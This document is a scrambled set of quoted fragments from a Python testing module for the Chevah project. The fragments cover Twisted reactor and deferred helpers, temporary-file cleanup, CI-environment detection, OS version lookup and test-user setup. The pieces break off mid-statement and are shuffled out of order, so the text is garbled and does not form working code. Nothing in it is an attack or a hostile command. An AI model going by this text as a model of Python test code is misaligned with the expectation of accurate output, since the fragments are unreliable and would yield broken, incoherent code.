FIXME:2099: # Windows XP reports", "0: have_callbacks = True continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False):", "'USERNAME' not in os.environ: os.environ['USERNAME'] = os.environ['USER'] if 'USERNAME' in", "fixtures/cleanup # code which is executed from another thread. #", "for i in range(2, 6): try: success = inspect.stack()[i][0].f_locals['success'] break", "= local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize) # FIXME:2099: # Windows XP", "account. \"\"\" @classmethod def setUpClass(cls): # FIXME:924: # Disabled when", "and return the failure. Usage:: checker = mk.credentialsChecker() credentials =", "execute.' % timeout) # Check executing all deferred from chained", "mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor() result = transport.value()", "when running the reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS = [", "debug=False): \"\"\" Iterate the reactor without stopping it. \"\"\" iterations", "deferred.addErrback(lambda failure: None) def assertIsFailure(self, deferred): \"\"\" Check that deferred", "] # Scheduled event to stop waiting for a deferred.", "'USER' not in os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user = os.environ['USER']", "iterate using a small delay in steps, # to have", "# Shut up you linter. TestCase else: from unittest import", "does not exists. This should only be called at cleanup", "stop procedure. return # Let the reactor know that we", "deferred.addErrback(lambda _: None) self.fail( \"No result expected on %r, found", "reactor.threadCallQueue) if reactor.threadpool and len(reactor.threadpool.working) > 0: raise_failure('active threads', reactor.threadCallQueue)", "= False # Start running has consumed the startup events,", "def _executeDeferred(self, deferred, timeout, debug): \"\"\" Does the actual deferred", "# List of partial thread names to ignore during the", "@staticmethod def patch(*args, **kwargs): \"\"\" Helper for generic patching. \"\"\"", "\"\"\" Clean all test files from folder_segments. Return a list", "temp folder and mark it for cleanup. \"\"\" kwargs['cleanup'] =", "be used by normal tests. \"\"\" if not reactor: return", "state # is changed from other source. pass reactor.threadCallQueue =", "without a result. This means that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>}", "case for Chevah tests. Checks that temporary folder is clean", "type(value), msg)) def tempPath(self, prefix='', suffix=''): \"\"\" Return (path, segments)", "raw_name.split(' ', 1)[0] def getDeferredFailure( self, deferred, timeout=None, debug=False, prevent_stop=False):", "AssertionError( 'executeDelayedCalls took more than %s' % (timeout,)) def executeReactorUntil(", "things as we already know that we need # to", "reactor.removeAll() except (RuntimeError, KeyError): # FIXME:863: # When running threads", "in steps, # to have a much better debug output.", "'ol']: # Normalize all RHEL variants. distro_name = 'rhel' distro_version", "reactor to wake at an # interval of at most", "= None def tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads = threading.enumerate() if", "enabled with iterate using a small delay in steps, #", "in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str: is_exception = True if", "threads', reactor.threadCallQueue) pool_queue = self._threadPoolQueue() if pool_queue: raise_failure('threadpoool queue', pool_queue)", "result.append(reactor.threadpool._team._pending.pop()) return result def _threadPoolThreads(self): \"\"\" Return current threads from", "self).setUp() # Initialized only to clean the home folder. test_filesystem", "self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\" if not isinstance(deferred, Deferred): raise", "temp which is auto cleaned. \"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix)", "Otherwise the debug messages will flood the output. print (", "threadpool does not exists. \"\"\" if not reactor.threadpool: return []", "the test case.''' success_state = None # We search starting", "\"\"\" iterations = [False] * (count - 1) iterations.append(True) self.executeReactorUntil(", "= process_capabilities.cpu_type ci_name = _get_ci_name() CI = _CI_NAMES TEST_LANGUAGE =", "and segments, which is auto cleaned. \"\"\" segments = mk.fs.createFolderInTemp(", "CI = _CI_NAMES TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN') # List of", "prevent stop in a previous run. if reactor._started: return reactor._startedBefore", "= reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) # Don't start the reactor", "deferred): \"\"\" Ignore the current failure on the deferred. It", "[] when threadpool does not exists. This should only be", "_UnixWaker, _SocketWaker, _SIGCHLDWaker, ] # Scheduled event to stop waiting", "def shortDescription(self): # noqa:cover \"\"\" The short description for the", "exception if `value` is not an instance of `expected_type` \"\"\"", "from twisted.internet.defer import Deferred from twisted.internet.posixbase import ( _SocketWaker, _UnixWaker,", "Deferred): self._executeDeferred(result, timeout=timeout, debug=debug) result = deferred.result def executeReactor(self, timeout=None,", "except ImportError: # Twisted support is optional. _SocketWaker = None", "reactor.addSystemEventTrigger( 'during', 'startup', reactor._reallyStartRunning) def _assertReactorIsClean(self): \"\"\" Check that the", "# Scheduled event to stop waiting for a deferred. _reactor_timeout_call", "deferred and return the failure. Usage:: checker = mk.credentialsChecker() credentials", "On OSX it returns `osx` followed by the version. It", "/ re-route this code after upgrading to Twisted 13.0. result", "a cleanup fails, the next cleanups will continue to be", "= WMI('.') query = ( u'SELECT PeakWorkingSetSize ' u'FROM Win32_Process", "save a few DNS queries. hostname = _get_hostname() Bunch =", "%r, \" \"found type %r instead: %s\" % ( expectedString,", "time.time() self.executeReactorUntil( lambda _: time.time() - start > duration, timeout=duration", "tests. Checks that temporary folder is clean at exit. \"\"\"", "being handled. \"\"\" deferred.addErrback(lambda failure: None) def assertIsFailure(self, deferred): \"\"\"", "'').lower() == 'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES':", "debug: # noqa:cover # When debug is enabled with iterate", "Return a string representation of all delayed calls from reactor", "not be considered as # required to wait for them", "`getDeferredResult`. Run the deferred in the reactor loop. Starts the", "instead\" % (deferred, result[0])) elif (expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)): expectedString", "return failure def successResultOf(self, deferred): \"\"\" Return the current success", "= False for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str:", "the reactor and stop it at the end. \"\"\" iterations", "will be automatically removed. \"\"\" return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix)", "shutdown for not being handled. \"\"\" deferred.addErrback(lambda failure: None) def", "in range(2, 6): try: success = inspect.stack()[i][0].f_locals['success'] break except KeyError:", "self._shutdownTestReactor() raise AssertionError( 'executeDelayedCalls took more than %s' % (timeout,))", "% (location, reason)) if reactor._started: # noqa:cover # Reactor was", "types to expect - if provided, and the the exception", "It is not the version of the underlying Darwin OS.", "system. \"\"\" return _get_hostname() @classmethod def initialize(cls, drop_user): \"\"\" Initialize", "\"\"\" super_assertRaises = super(ChevahTestCase, self).assertRaises if callback is None: return", "test. Only use this for very high level integration code,", "L{Deferred<twisted.internet.defer.Deferred>} which has a failure result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or", "path which is not created yet but which will be", "Overwrite stdlib to swap the arguments. \"\"\" if source not", "\"\"\" Iterate the reactor and stop it at the end.", "\"\"\" Return the current failure result of C{deferred} or raise", "on %r, \" \"found failure result instead:\\n%s\" % ( deferred,", "\"\"\" return socket.gethostname() class TwistedTestCase(TestCase): \"\"\" Test case for Twisted", "@raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result or has", "most tests you would like to use one of the", "try: reactor.removeAll() except (RuntimeError, KeyError): # FIXME:863: # When running", "we want to force to reactor to wake at an", "When not executed in debug mode, some test will fail", "persistent deferred which will be removed only at the end", "be called at the end of a stacked cleanup. \"\"\"", "Checks that temporary folder is clean at exit. \"\"\" os_name", "result. @return: The failure result of C{deferred}. @rtype: L{failure.Failure} \"\"\"", "In Python 2.7 isInstance is already defined, but with swapped", "import time from bunch import Bunch from mock import patch,", "`getDeferredFailure` or `getDeferredResult`. Usage:: protocol = mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol()", "= None _SIGCHLDWaker = None from chevah.compat import ( DefaultAvatar,", "will call lsb_release. import ld distro_name = ld.id() if distro_name", "\"\"\" Return `True` if is OK for thread to exist", "Kilobytes. return int(peak_working_set_size) else: raise AssertionError('OS not supported.') def folderInTemp(self,", "LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase,", "temp_members @classmethod def getPeakMemoryUsage(cls): \"\"\" Return maximum memory usage in", "or `getDeferredResult`. Run the deferred in the reactor loop. Starts", "credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result)", "readers or writers or threads are in the queues. Set", "the reactor. \"\"\" self.assertWasCalled(deferred) if isinstance(deferred.result, Failure): error = deferred.result", "args, kwargs in reversed(self.__cleanup__): try: function(*args, **kwargs) except Exception as", "if reactor._started: return reactor._startedBefore = False reactor._started = False reactor._justStopped", "False # Check for active jobs in thread pool. if", "code after upgrading to Twisted 13.0. result = [] deferred.addBoth(result.append)", "reactor loop. Starts the reactor, waits for deferred execution, raises", "in reversed(self.__cleanup__): try: function(*args, **kwargs) except Exception as error: #", "or threads are in the queues. Set run_once=True to only", "%r, found no result instead\" % ( deferred,)) elif isinstance(result[0],", "Return current threads from pool, or empty list when threadpool", "% (parts[0], parts[1]) # We are now in Unix zone.", "(count - 1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug,", "if you have persistent deferred which will be removed only", "removed on #: teardown. CREATE_TEST_USER = None @classmethod def setUpTestUser(cls):", "at threads queue and active thread. if len(reactor.threadCallQueue) > 0:", "expected on %r, found %r instead\" % ( deferred, result[0]))", "# Check for active jobs in thread pool. if reactor.threadpool:", "except Exception as error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__ = []", "errors.append(error.message) if errors: # noqa:cover self._teardown_errors.append(AssertionError( 'There are temporary files", "recursive=True) else: temp_filesystem.deleteFile(segments) return temp_members @classmethod def getPeakMemoryUsage(cls): \"\"\" Return", "checks: try: check() except AssertionError as error: errors.append(error.message) if errors:", "failure on the deferred. It transforms an failure into result", "the reactor without stopping it. \"\"\" iterations = [False] *", "fine, disable timeout. if ( self._reactor_timeout_call and not self._reactor_timeout_call.cancelled ):", "result = transport.value() self.assertStartsWith('211-Features:\\n', result) \"\"\" if timeout is None:", "reactor.threadpool: if ( reactor.threadpool.working or (reactor.threadpool.q.qsize() > 0) ): time.sleep(0.01)", "folder. Return a list of members which were removed. \"\"\"", "% (error)) def _get_os_version(): \"\"\" On non-Linux this is just", "queue and active thread. if len(reactor.threadCallQueue) > 0: have_callbacks =", "callback or errback raised an exception or returned a L{failure.Failure}.", "was called. \"\"\" if not deferred.called: raise AssertionError('This deferred was", "second stack, since first stack is the # current stack", "if os.environ.get('BUILDBOT', '').lower() == 'true': return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower()", "deferred.\\n' '%s' % (self._reactorQueueToString())) break # Look at writers buffers:", "_SocketWaker, _SIGCHLDWaker, ] # Scheduled event to stop waiting for", "multi-threading. pass def _raiseReactorTimeoutError(self, timeout): \"\"\" Signal an timeout error", "None _UnixWaker = None _SIGCHLDWaker = None from chevah.compat import", "result = [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return result def _threadPoolThreads(self):", "while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return result def _threadPoolThreads(self): \"\"\" Return current", "second, msg): super(ChevahTestCase, self).assertSetEqual(first, second, msg) first_elements = sorted(first) second_elements", "got %s. %s\" % ( expected_type, type(value), msg)) def tempPath(self,", "= [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return result def _threadPoolThreads(self): \"\"\"", "= super(ChevahTestCase, self).assertRaises if callback is None: return super_assertRaises(exception_class) with", "return reactor.threadpool.threads def _threadPoolWorking(self): \"\"\" Return working thread from pool,", "the hostname of the current system. \"\"\" return _get_hostname() @classmethod", "\"\"\" if not isinstance(deferred, Deferred): raise AssertionError('This is not a", "suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return (path, segments)", "have_callbacks = True continue for reader in reactor.getReaders(): have_callbacks =", "self._reactor_timeout_call and not self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel() if prevent_stop: # Don't", "other things as we already know that we need #", "has a success result, or has an unexpected failure result.", "[] for check in checks: try: check() except AssertionError as", "\"\"\" Add `CREATE_TEST_USER` to local OS. \"\"\" os_administration.addUser(cls.CREATE_TEST_USER) return cls.CREATE_TEST_USER", "# Import reactor last in case some other modules are", "elif not isinstance(result[0], Failure): self.fail( \"Failure result expected on %r,", "= os.environ['USER'] if 'USERNAME' in os.environ and 'USER' not in", "if os.environ.get('CI', '').lower() == 'true': return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class", "mk.fs.exists(folder_segments): return [] # In case we are running the", "file system testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user =", "this code after upgrading to Twisted 13.0. result = []", "created yet but which will be automatically removed. \"\"\" return", "\"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.') segments", "token=cls.os_user.token, ) cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if not", "pass def _raiseReactorTimeoutError(self, timeout): \"\"\" Signal an timeout error while", "a file in the default temp folder and mark it", "_assertReactorIsClean(self): \"\"\" Check that the reactor has no delayed calls,", "you don't have the change to get a \"root\" deferred.", "result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on", "not in os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder()", "def tempPath(self, prefix='', suffix=''): \"\"\" Return (path, segments) for a", "and len(reactor.threadpool.working) > 0: raise_failure('active threads', reactor.threadCallQueue) pool_queue = self._threadPoolQueue()", "reactor.threadCallQueue = [] for delayed_call in reactor.getDelayedCalls(): try: delayed_call.cancel() except", "Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials)", "setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ = [] self._cleanup_stack = [] self._teardown_errors", "< (2, 7): from unittest2 import TestCase # Shut up", "reason): raise AssertionError( 'Reactor is not clean. %s: %s' %", "reactor.doIteration(t) else: # FIXME:4428: # When not executed in debug", "the reactor. This will do recursive calls, in case the", "`None` so that the failure will not be raised at", "= Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def", "(path, segments) for a path which is not created yet", "result at this point. If the assertion succeeds, then the", "exception or returned a L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes:", "== '-': return os.environ['USERNAME'] = cls._drop_user os.environ['USER'] = cls._drop_user #", "detects that internal state # is changed from other source.", "instead:\\n%s\" % ( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0]", "for a path which is not created yet but which", "the end of its callback chain and the last callback", "False reactor._justStopped = False reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\" Iterate", "for a deferred. _reactor_timeout_call = None def setUp(self): super(TwistedTestCase, self).setUp()", "None: raise AssertionError('Failed to find \"success\" attribute.') return success def", "temporary folder is clean at exit. \"\"\" os_name = process_capabilities.os_name", "**kwargs) @staticmethod def patchObject(*args, **kwargs): \"\"\" Helper for patching objects.", "Return the hostname of the current system. \"\"\" return _get_hostname()", "= mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor() result =", "for Twisted specific code. Provides support for running deferred and", "self.fail( \"Failure result expected on %r, \" \"found success result", "method, to avoid propagating the error into the reactor. \"\"\"", "for the full thread name excepted_threads = [ 'MainThread', 'threaded_reactor',", "\"\"\" To be called at the end of a stacked", "seconds.. \"\"\" start = time.time() self.executeReactorUntil( lambda _: time.time() -", "result expected on %r, found no result instead\" % (", "opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content) finally: opened_file.close() return (path, segments) def", "super(ChevahTestCase, self).assertDictEqual(first, second, msg) first_keys = sorted(first.keys()) second_keys = sorted(second.keys())", "else: temp_avatar = DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members = []", "report it, so swallow it in the deferred deferred.addErrback(lambda _:", "don't have the change to get a \"root\" deferred. In", "executed. \"\"\" if os.environ.get('BUILDBOT', '').lower() == 'true': return _CI_NAMES.BUILDBOT if", "the self.fail below will # report it, so swallow it", "is str while second is unicode for \"%s\".' % (", "we use the separate unittest2 module. # It comes by", "first_element, second_element in zip(first, second): self.assertEqual(first_element, second_element) def assertDictEqual(self, first,", "if base == 'aarch64': return 'arm64' if base == 'x86_64':", "To not slow down all the tests, we run with", "\"\"\" Check that the reactor has no delayed calls, readers", "timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached:", "file-system tests using a real OS account. \"\"\" @classmethod def", "'USER' in os.environ and 'USERNAME' not in os.environ: os.environ['USERNAME'] =", "= None from chevah.compat import ( DefaultAvatar, LocalFilesystem, process_capabilities, system_users,", "# Check executing all deferred from chained callbacks. result =", "!= 'linux': return process_capabilities.os_name # We delay the import as", "the reactor, waits for deferred execution, raises error in timeout,", "the the exception wrapped by the failure result is not", "', 1)[0] def getDeferredFailure( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\"", "ValueError. # Might be canceled from the separate thread. #", "which the tests are currently executed. \"\"\" if os.environ.get('BUILDBOT', '').lower()", "if have_callbacks: break if have_callbacks: continue # Look at threads", "import Deferred from twisted.internet.posixbase import ( _SocketWaker, _UnixWaker, _SIGCHLDWaker )", "platform import socket import sys import time from bunch import", "raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls(): if delayed_call.active(): delayed_str =", "down all the tests, we run with a very small", "Update to stdlib to make sure we don't compare str", "%s' % (timeout,)) def executeReactorUntil( self, callable, timeout=None, debug=False, prevent_stop=True):", "( deferred, result[0])) def getDeferredResult( self, deferred, timeout=None, debug=False, prevent_stop=False):", "is just the os_name. On Linux is the distribution name", "= [] for check in checks: try: check() except AssertionError", "os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod def setUpTestUser(cls): \"\"\" Set-up OS user", "self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, )", "mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred)", "and the version. On Windows it is the `nt` followed", "callback or errback returned a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise", "if not result: self.fail( \"Failure result expected on %r, found", "in a previous run. if reactor._started: return reactor._startedBefore = False", "to reactor to wake at an # interval of at", "# For testing we want to force to reactor to", "is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug)", "will continue to be called and the first failure is", "error if deferred is a Failure. The failed deferred is", "(%s) expected on %r, \" \"found type %r instead: %s\"", "files or folders are present. \"\"\" # FIXME:922: # Move", "= None @classmethod def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER` to local", "'executeDelayedCalls took more than %s' % (timeout,)) def executeReactorUntil( self,", "a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>}", "LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case for tests that", "clean at exit. \"\"\" os_name = process_capabilities.os_name os_family = process_capabilities.os_family", "exists. This should only be called at cleanup as it", "the debug messages will flood the output. print ( u'delayed:", "continue raise_failure('delayed calls', delayed_str) def _runDeferred( self, deferred, timeout=None, debug=False,", "waiting on another L{Deferred<twisted.internet.defer.Deferred>} for a result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>}", "ld.id() if distro_name == 'arch': # Arch has no version.", "AssertionMixin from chevah.compat.testing.mockup import mk from chevah.compat.testing.constant import ( TEST_NAME_MARKER,", "patching. \"\"\" return patch(*args, **kwargs) @staticmethod def patchObject(*args, **kwargs): \"\"\"", "reversed(self.__cleanup__): try: function(*args, **kwargs) except Exception as error: # noqa:cover", "self._timeout_reached: # Everything fine, disable timeout. if ( self._reactor_timeout_call and", "and not isinstance(second, text_type) ): # noqa:cover if not msg:", "self._shutdownTestReactor() raise AssertionError('Reactor was not stopped.') # Look at threads", "- 1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug, prevent_stop=False,", "EXCEPTED_READERS = [ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ] # Scheduled event", "print ( u'delayed: %s\\n' u'threads: %s\\n' u'writers: %s\\n' u'readers: %s\\n'", "deferred in the reactor loop. Starts the reactor, waits for", "and len(reactor.threadpool.working) > 0: have_callbacks = True continue self._shutdownTestReactor() def", "instance of `expected_type` \"\"\" # In Python 2.7 isInstance is", "from chevah.compat.administration import os_administration from chevah.compat.testing.assertion import AssertionMixin from chevah.compat.testing.mockup", "cleanup method before tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs)) def callCleanup(self):", "\"\"\" Helper for generic patching. \"\"\" return patch(*args, **kwargs) @staticmethod", "not executed in debug mode, some test will fail as", "of a stacked cleanup. \"\"\" self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager", "were removed. \"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path =", "t in expectedExceptionTypes]) self.fail( \"Failure of type (%s) expected on", "deferred: L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes: Exception types to expect - if", "'beside the main thread: %s - %s' % ( thread_name,", "# In case we are running the test suite as", "return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase, AssertionMixin): \"\"\" Test case", "timeout=None, debug=False): \"\"\" Iterate the reactor and stop it at", "super(ChevahTestCase, self).setUp() self.__cleanup__ = [] self._cleanup_stack = [] self._teardown_errors =", "# For Python below 2.7 we use the separate unittest2", "executeReactor(self, timeout=None, debug=False, run_once=False): \"\"\" Run reactor until no more", "from the reactor. This is only for cleanup purpose and", "self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred, timeout, debug=debug) finally: self._shutdownTestReactor( prevent_stop=prevent_stop) def _executeDeferred(self, deferred,", "not deferred.called: raise AssertionError('This deferred was not called yet.') def", "CREATE_TEST_USER = None @classmethod def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER` to", "'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] # We assume that hostname", "self._teardown_errors, None if errors: raise AssertionError('Cleanup errors: %r' % (errors,))", "not a deferred.') if timeout is None: timeout = self.DEFERRED_TIMEOUT", "Failure): self.fail( \"Success result expected on %r, \" \"found failure", "the reactor has no delayed calls, readers or writers. This", "assertWasCalled(self, deferred): \"\"\" Check that deferred was called. \"\"\" if", "is a Failure. The failed deferred is handled by this", "are now in Unix zone. os_name = os.uname()[0].lower() if os_name", "the error. \"\"\" class_name = text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test')", "representation of the delayed call. \"\"\" raw_name = text_type(delayed_call.func) raw_name", "return 'solaris-%s' % (parts[1],) if os_name == 'aix': # noqa:cover", "end of test. Only use this for very high level", "'true': return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return _CI_NAMES.GITHUB", "%s' % (error)) def _get_os_version(): \"\"\" On non-Linux this is", "a clean reactor at shutdown, only if test # passed.", "end of its callback chain and the last callback or", "== 'posix': import resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt':", "_drop_user = '-' def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ = []", "(platform.version(), platform.release()) if os_name != 'linux': return process_capabilities.os_name # We", "AssertionError( 'Deferred took more than %d to execute.' % timeout)", "called at teardown. \"\"\" if reactor is None: return def", "# to restore them. reactor.addSystemEventTrigger( 'during', 'startup', reactor._reallyStartRunning) def _assertReactorIsClean(self):", "return def raise_failure(location, reason): raise AssertionError( 'Reactor is not clean.", "# AttributeError can occur when we do multi-threading. pass def", "# This can happen if we prevent stop in a", "False for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str: is_exception", "self._reactor_timeout_failure = None @property def _caller_success_member(self): \"\"\" Retrieve the 'success'", "debug=debug) def iterateReactorWithStop(self, count=1, timeout=None, debug=False): \"\"\" Iterate the reactor", "SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has a result. \"\"\" # FIXME:1370:", "timeout) # Check executing all deferred from chained callbacks. result", "into result `None` so that the failure will not be", "= self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\" Context manager for stacked", "seq_type): super(ChevahTestCase, self).assertSequenceEqual( first, second, msg, seq_type) for first_element, second_element", "after upgrading to Twisted 13.0. result = [] deferred.addBoth(result.append) if", "[] def cb(res): result.append(res) return res deferred.addBoth(cb) if result: #", "result. @return: The result of C{deferred}. \"\"\" # FIXME:1370: #", "if have_callbacks: raise AssertionError( 'Reactor queue still contains delayed deferred.\\n'", "= False reactor._started = False reactor._justStopped = False reactor.running =", "with second stack, since first stack is the # current", "to execute.' % timeout) # Check executing all deferred from", "\"\"\" if os.environ.get('BUILDBOT', '').lower() == 'true': return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS',", "process_capabilities, system_users, SuperAvatar, ) from chevah.compat.administration import os_administration from chevah.compat.testing.assertion", "by this method, to avoid propagating the error into the", "cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop privileges to", "= True continue # Look at delayed calls. for delayed", "other modules are changing the reactor. from twisted.internet import reactor", "it in the deferred deferred.addErrback(lambda _: None) self.fail( \"No result", "**kwargs) except Exception as error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__ =", "a deferred to have a result. DEFERRED_TIMEOUT = 1 #", "for patching objects. \"\"\" return patch.object(*args, **kwargs) def now(self): \"\"\"", "occur when we do multi-threading. pass def _raiseReactorTimeoutError(self, timeout): \"\"\"", "= LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case for tests", ") from chevah.compat.administration import os_administration from chevah.compat.testing.assertion import AssertionMixin from", "sys.version_info[0:2] < (2, 7): from unittest2 import TestCase # Shut", "is executed from another thread. # removeAll might fail since", "present. \"\"\" #: User will be created before running the", "tests_start = class_name.find('.tests.') + 7 class_name = class_name[tests_start:] return \"%s", "self.assertStartsWith('211-Features:\\n', result) \"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT", "removed. \"\"\" return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def tempFile(self, content='',", "mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return (path, segments) class FileSystemTestCase(ChevahTestCase): \"\"\"", "the CPU type as used in the brink.sh script. \"\"\"", "run with a very small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False):", "FIXME:922: # Move all filesystem checks into a specialized class", "reactor until no more delayed calls, readers or writers or", "when start using stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = []", "Ignore the current failure on the deferred. It transforms an", "getHostname(): \"\"\" Return the hostname of the current system. \"\"\"", "not in target: message = u'%s not in %s.' %", "u'delayed: %s\\n' u'threads: %s\\n' u'writers: %s\\n' u'readers: %s\\n' u'threadpool size:", "returned a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the", "'').lower() == 'true': return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true':", "if ( isinstance(first, text_type) and not isinstance(second, text_type) ): #", "reactor.timeout() # For testing we want to force to reactor", "upgrading to Twisted 13.0. result = [] deferred.addBoth(result.append) if not", "for generic patching. \"\"\" return patch(*args, **kwargs) @staticmethod def patchObject(*args,", "Chevah project. \"\"\" from __future__ import print_function from __future__ import", "= mk.credentials() deferred = checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError, failure)", "up timeout. self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) # Don't", "with iterate using a small delay in steps, # to", "or writers. This should only be called at teardown. \"\"\"", "t2 reactor.doIteration(t) else: # FIXME:4428: # When not executed in", "has been called, or that the L{Deferred<twisted.internet.defer.Deferred>} is waiting on", "running the test case and removed on #: teardown. CREATE_TEST_USER", "import division from __future__ import absolute_import from six import text_type", "self._testMethodName, class_name, self._testMethodName) def assertRaises(self, exception_class, callback=None, *args, **kwargs): \"\"\"", "2011 <NAME>. # See LICENSE for details. \"\"\" TestCase used", "reactor.running = False # Start running has consumed the startup", "most 1 second. if t2 is None or t2 >", "# FIXME:1370: # Remove / re-route this code after upgrading", "(repr(source), repr(target)) raise AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type, value, msg=None): 